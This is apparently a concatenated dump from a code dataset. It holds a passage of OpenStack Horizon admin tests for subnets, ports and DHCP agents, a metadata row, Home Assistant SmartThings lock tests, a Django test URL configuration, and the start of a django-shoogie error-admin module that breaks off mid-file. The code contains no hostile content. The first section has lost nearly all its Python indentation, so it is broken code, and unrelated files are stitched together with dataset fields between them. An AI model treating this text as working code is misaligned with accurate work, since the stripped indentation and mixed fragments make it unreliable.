        # The admin DetailView is shared with the user panel's view, so the
        # redirection URL on error is the user panel index.
redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_get(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addsubnet',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.subnet_create(IsA(http.HttpRequest),
network_id=network.id,
name=subnet.name,
cidr=subnet.cidr,
ip_version=subnet.ip_version,
gateway_ip=subnet.gateway_ip,
enable_dhcp=subnet.enable_dhcp,
allocation_pools=subnet.allocation_pools,
tenant_id=subnet.tenant_id)\
.AndReturn(subnet)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet)
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post_network_exception(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
        # The admin DetailView is shared with the user panel's view, so the
        # redirection URL on error is the user panel index.
redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post_subnet_exception(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.subnet_create(IsA(http.HttpRequest),
network_id=network.id,
name=subnet.name,
cidr=subnet.cidr,
ip_version=subnet.ip_version,
gateway_ip=subnet.gateway_ip,
enable_dhcp=subnet.enable_dhcp,
tenant_id=subnet.tenant_id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_post_cidr_inconsistent(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
# dummy IPv6 address
cidr = '2001:0DB8:0:CD30:123:4567:89AB:CDEF/60'
form_data = tests.form_data_subnet(
subnet, cidr=cidr, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
expected_msg = 'Network Address and IP version are inconsistent.'
self.assertContains(res, expected_msg)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_post_gw_inconsistent(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
# dummy IPv6 address
gateway_ip = '2001:0DB8:0:CD30:123:4567:89AB:CDEF'
form_data = tests.form_data_subnet(subnet, gateway_ip=gateway_ip,
allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertContains(res, 'Gateway IP and IP version are inconsistent.')
@test.create_stubs({api.neutron: ('subnet_update',
'subnet_get',)})
def test_subnet_update_post(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
api.neutron.subnet_update(IsA(http.HttpRequest), subnet.id,
name=subnet.name,
enable_dhcp=subnet.enable_dhcp,
dns_nameservers=[],
host_routes=[])\
.AndReturn(subnet)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:editsubnet',
args=[subnet.network_id, subnet.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('subnet_update',
'subnet_get',)})
def test_subnet_update_post_gw_inconsistent(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(subnet)
self.mox.ReplayAll()
# dummy IPv6 address
gateway_ip = '2001:0DB8:0:CD30:123:4567:89AB:CDEF'
form_data = tests.form_data_subnet(subnet, gateway_ip=gateway_ip,
allocation_pools=[])
url = reverse('horizon:admin:networks:editsubnet',
args=[subnet.network_id, subnet.id])
res = self.client.post(url, form_data)
self.assertContains(res, 'Gateway IP and IP version are inconsistent.')
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete(self):
self._test_subnet_delete()
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_with_mac_learning(self):
self._test_subnet_delete(mac_learning=True)
def _test_subnet_delete(self, mac_learning=False):
subnet = self.subnets.first()
network_id = subnet.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_delete(IsA(http.HttpRequest), subnet.id)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'subnets__delete__%s' % subnet.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_exception(self):
self._test_subnet_delete_exception()
@test.create_stubs({api.neutron: ('subnet_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_subnet_delete_exception_with_mac_learning(self):
self._test_subnet_delete_exception(mac_learning=True)
def _test_subnet_delete_exception(self, mac_learning=False):
subnet = self.subnets.first()
network_id = subnet.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_delete(IsA(http.HttpRequest), subnet.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'subnets__delete__%s' % subnet.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
class NetworkPortTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_detail(self):
self._test_port_detail()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_detail_with_mac_learning(self):
self._test_port_detail(mac_learning=True)
def _test_port_detail(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(self.ports.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:ports:detail',
args=[port.id]))
self.assertTemplateUsed(res, 'project/networks/ports/detail.html')
self.assertEqual(res.context['port'].id, port.id)
@test.create_stubs({api.neutron: ('port_get',)})
def test_port_detail_exception(self):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:ports:detail',
args=[port.id]))
        # The admin DetailView is shared with the user panel's view, so the
        # redirection URL on error is the user panel index.
redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get(self):
self._test_port_create_get()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get_with_mac_learning(self):
self._test_port_create_get(mac_learning=True)
def _test_port_create_get(self, mac_learning=False):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addport',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/create.html')
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post(self):
self._test_port_create_post()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post_with_mac_learning(self):
self._test_port_create_post(mac_learning=True)
def _test_port_create_post(self, mac_learning=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception(self):
self._test_port_create_post_exception()
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception_with_mac_learning(self):
self._test_port_create_post_exception(mac_learning=True)
def _test_port_create_post_exception(self, mac_learning=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'mac_state': True,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_learning_enabled'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get(self):
self._test_port_update_get()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get_with_mac_learning(self):
self._test_port_update_get(mac_learning=True)
def _test_port_update_get(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest),
port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/update.html')
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post(self):
self._test_port_update_post()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_with_mac_learning(self):
self._test_port_update_post(mac_learning=True)
def _test_port_update_post(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception(self):
self._test_port_update_post_exception()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception_with_mac_learning(self):
self._test_port_update_post_exception(mac_learning=True)
def _test_port_update_post_exception(self, mac_learning=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner}
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse('horizon:admin:networks:detail',
args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete(self):
self._test_port_delete()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_with_mac_learning(self):
self._test_port_delete(mac_learning=True)
def _test_port_delete(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.port_delete(IsA(http.HttpRequest), port.id)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_exception(self):
self._test_port_delete_exception()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks')})
def test_port_delete_exception_with_mac_learning(self):
self._test_port_delete_exception(mac_learning=True)
def _test_port_delete_exception(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.port_delete(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
class NetworkAgentTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',)})
def test_agent_add_get(self):
network = self.networks.first()
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.agents.list())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/agents/add.html')
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',
'add_network_to_dhcp_agent',)})
def test_agent_add_post(self):
network = self.networks.first()
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn([self.agents.list()[1]])
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.add_network_to_dhcp_agent(IsA(http.HttpRequest),
agent_id, network.id)\
.AndReturn(True)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'network_name': network.name,
'agent': agent_id}
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[network.id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('agent_list',
'network_get',
'list_dhcp_agent_hosting_networks',
'add_network_to_dhcp_agent',)})
def test_agent_add_post_exception(self):
network = self.networks.first()
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn([self.agents.list()[1]])
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
api.neutron.agent_list(IsA(http.HttpRequest), agent_type='DHCP agent')\
.AndReturn(self.agents.list())
api.neutron.add_network_to_dhcp_agent(IsA(http.HttpRequest),
agent_id, network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'network_name': network.name,
'agent': agent_id}
url = reverse('horizon:admin:networks:adddhcpagent',
args=[network.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[network.id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported',
'remove_network_from_dhcp_agent',)})
def test_agent_delete(self):
network_id = self.networks.first().id
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.remove_network_from_dhcp_agent(IsA(http.HttpRequest),
agent_id, network_id)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(False)
self.mox.ReplayAll()
form_data = {'action': 'agents__delete__%s' % agent_id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported',
'remove_network_from_dhcp_agent',)})
def test_agent_delete_exception(self):
network_id = self.networks.first().id
agent_id = self.agents.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.remove_network_from_dhcp_agent(IsA(http.HttpRequest),
agent_id, network_id)\
.AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(False)
self.mox.ReplayAll()
form_data = {'action': 'agents__delete__%s' % agent_id}
url = reverse('horizon:admin:networks:detail',
args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
| apache-2.0 | 6,632,336,158,950,868,000 | 44.156444 | 79 | 0.533866 | false |
jabesq/home-assistant | tests/components/smartthings/test_lock.py | 10 | 4273 | """
Test for the SmartThings lock platform.
The only mocking required is of the underlying SmartThings API object so
real HTTP calls are not initiated during testing.
"""
from pysmartthings import Attribute, Capability
from pysmartthings.device import Status
from homeassistant.components.lock import DOMAIN as LOCK_DOMAIN
from homeassistant.components.smartthings import lock
from homeassistant.components.smartthings.const import (
DOMAIN, SIGNAL_SMARTTHINGS_UPDATE)
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .conftest import setup_platform
async def test_async_setup_platform():
"""Test setup platform does nothing (it uses config entries)."""
await lock.async_setup_platform(None, None, None)
async def test_entity_and_device_attributes(hass, device_factory):
"""Test the attributes of the entity are correct."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'unlocked'})
entity_registry = await hass.helpers.entity_registry.async_get_registry()
device_registry = await hass.helpers.device_registry.async_get_registry()
# Act
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Assert
entry = entity_registry.async_get('lock.lock_1')
assert entry
assert entry.unique_id == device.device_id
entry = device_registry.async_get_device(
{(DOMAIN, device.device_id)}, [])
assert entry
assert entry.name == device.label
assert entry.model == device.device_type_name
assert entry.manufacturer == 'Unavailable'
async def test_lock(hass, device_factory):
"""Test the lock locks successfully."""
# Arrange
device = device_factory('Lock_1', [Capability.lock])
device.status.attributes[Attribute.lock] = Status(
'unlocked', None, {
'method': 'Manual',
'codeId': None,
'codeName': 'Code 1',
'lockName': 'Front Door',
'usedCode': 'Code 2'
})
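    # The extra values carried on the Status above are surfaced as state
    # attributes by the lock entity and asserted below.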
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.services.async_call(
LOCK_DOMAIN, 'lock', {'entity_id': 'lock.lock_1'},
blocking=True)
# Assert
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'locked'
assert state.attributes['method'] == 'Manual'
assert state.attributes['lock_state'] == 'locked'
assert state.attributes['code_name'] == 'Code 1'
assert state.attributes['used_code'] == 'Code 2'
assert state.attributes['lock_name'] == 'Front Door'
assert 'code_id' not in state.attributes
async def test_unlock(hass, device_factory):
"""Test the lock unlocks successfully."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'locked'})
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.services.async_call(
LOCK_DOMAIN, 'unlock', {'entity_id': 'lock.lock_1'},
blocking=True)
# Assert
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'unlocked'
async def test_update_from_signal(hass, device_factory):
"""Test the lock updates when receiving a signal."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'unlocked'})
await setup_platform(hass, LOCK_DOMAIN, devices=[device])
await device.lock(True)
# Act
async_dispatcher_send(hass, SIGNAL_SMARTTHINGS_UPDATE,
[device.device_id])
# Assert
await hass.async_block_till_done()
state = hass.states.get('lock.lock_1')
assert state is not None
assert state.state == 'locked'
async def test_unload_config_entry(hass, device_factory):
"""Test the lock is removed when the config entry is unloaded."""
# Arrange
device = device_factory('Lock_1', [Capability.lock],
{Attribute.lock: 'locked'})
config_entry = await setup_platform(hass, LOCK_DOMAIN, devices=[device])
# Act
await hass.config_entries.async_forward_entry_unload(
config_entry, 'lock')
# Assert
assert not hass.states.get('lock.lock_1')
| apache-2.0 | 5,050,498,303,945,628,000 | 35.211864 | 77 | 0.657852 | false |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/tests/urls.py | 21 | 1690 | from django.conf.urls.defaults import *
urlpatterns = patterns('',
# test_client modeltest urls
(r'^test_client/', include('modeltests.test_client.urls')),
(r'^test_client_regress/', include('regressiontests.test_client_regress.urls')),
# File upload test views
(r'^file_uploads/', include('regressiontests.file_uploads.urls')),
# Always provide the auth system login and logout views
(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),
(r'^accounts/logout/$', 'django.contrib.auth.views.logout'),
# test urlconf for {% url %} template tag
(r'^url_tag/', include('regressiontests.templates.urls')),
# django built-in views
(r'^views/', include('regressiontests.views.urls')),
# test urlconf for middleware tests
(r'^middleware/', include('regressiontests.middleware.urls')),
# admin view tests
(r'^test_admin/', include('regressiontests.admin_views.urls')),
(r'^generic_inline_admin/', include('regressiontests.generic_inline_admin.urls')),
# admin widget tests
(r'widget_admin/', include('regressiontests.admin_widgets.urls')),
# test urlconf for syndication tests
(r'^syndication/', include('regressiontests.syndication.urls')),
# conditional get views
(r'condition/', include('regressiontests.conditional_processing.urls')),
# middleware exceptions tests
(r'middleware_exceptions/', include('regressiontests.middleware_exceptions.urls')),
# special headers views
(r'special_headers/', include('regressiontests.special_headers.urls')),
# test util views
(r'test_utils/', include('regressiontests.test_utils.urls')),
)
| apache-2.0 | -2,830,122,244,879,429,000 | 35.73913 | 95 | 0.688757 | false |
altaurog/django-shoogie | shoogie/admin.py | 1 | 6152 | from django.contrib import admin
from django.contrib.admin.views.main import ChangeList
try:
from django.conf.urls import patterns, url
except ImportError:
from django.conf.urls.defaults import patterns, url
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from . import models, utils, views
def get_name(user):
return user.get_full_name() or user.username
class Truncate(object):
max_length = 50
def __init__(self, attrname, max_length=None):
self.attrname = attrname
self.__name__ = attrname
if max_length is not None:
self.max_length = max_length
def __call__(self, instance):
val = getattr(instance, self.attrname, '')
return utils.truncate(val, self.max_length)
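# Example: Truncate('exception_str', 80) yields a callable suitable for
# ModelAdmin.list_display that renders the attribute cut to 80 characters.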
class FasterChangeList(ChangeList):
"Defers large fields we don't use"
defer_fields = (
'post_data',
'cookie_data',
'session_data',
'technical_response',
)
# get_query_set() was renamed to get_queryset() in Django 1.6
def get_queryset(self, *args, **kwargs):
changelist = super(FasterChangeList, self)
if hasattr(changelist, 'get_queryset'):
qset = changelist.get_queryset(*args, **kwargs)
else:
qset = changelist.get_query_set(*args, **kwargs)
return qset.defer(*self.defer_fields)
get_query_set = get_queryset
class ServerErrorAdmin(admin.ModelAdmin):
list_display = (Truncate('exception_type', 40),
Truncate('exception_str', 80),
'path_link',
'error_date_format',
'user_link',
'technicalresponse_link',
'resolved',)
date_hierarchy = 'timestamp'
search_fields = ('request_path', 'exception_type', 'exception_str', 'source_file', 'source_function', 'source_text')
actions = ('get_email_list', 'resolve_servererror', 'unresolve_servererror')
exclude = ('technical_response',)
readonly_fields = (
'timestamp',
'hostname',
'request_method',
'request_path',
'query_string',
'post_data',
'cookie_data',
'session_id',
'session_data',
'user',
'exception_type',
'exception_str',
'source_file',
'source_line_num',
'source_function',
'source_text',
)
# queryset() was renamed to get_queryset() in Django 1.6
def get_queryset(self, request):
model_admin = super(ServerErrorAdmin, self)
if hasattr(model_admin, 'get_queryset'):
qset = model_admin.get_queryset(request)
else:
qset = model_admin.queryset(request)
return qset.select_related('user')
